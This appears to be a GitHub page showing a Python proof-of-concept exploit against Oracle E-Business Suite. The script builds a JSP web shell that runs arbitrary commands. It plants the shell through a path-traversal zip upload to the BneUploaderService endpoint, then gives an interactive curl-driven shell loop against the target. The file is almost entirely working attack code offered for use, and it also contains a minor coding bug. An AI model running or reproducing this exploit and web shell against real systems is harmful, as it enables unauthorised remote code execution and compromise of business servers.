-
Notifications
You must be signed in to change notification settings - Fork 7
/
EBS_N_Overwrite.py
63 lines (57 loc) · 1.77 KB
/
EBS_N_Overwrite.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/python3
#POC by HMs
import requests
import os
import sys
shell = '''
<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String line = dis.readLine();
while(line != null) {
out.println(line);
line = dis.readLine();
}
}
%>
'''
def Write_Shell():
with open("shell.jsp", "w") as f:
f.writelines("%s \n" %(shell))
os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/applications/forms/forms/' shell.zip shell.jsp")
os.system("uuencode shell.zip shell.zip > shell.uue")
def exploit():
Write_Shell()
host = sys.argv[1]
if host.endswith == '/':
url = host + 'OA_HTML/BneUploaderService?bne:uueupload=true'
url_shell = host + 'forms/shell.jsp'
else:
url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true'
url_shell = host + '/forms/shell.jsp'
file = 'shell.uue'
up = {
'text':(file,open(file, 'rb'),
"multipart/mixed"
)
}
request = requests.post(url,files=up)
check = requests.get(url_shell)
if check.status_code == 200:
print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')
while True:
cmd = input("~shell[~]: ")
if cmd == 'q' or cmd == 'quit' or cmd == 'Q':
break
else:
#print("curl %s?cmd=%s" % (url_shell,cmd))
os.system("curl %s?cmd=%s" % (url_shell,cmd))
else:
print("\nnot vuln")
if __name__ == '__main__':
exploit()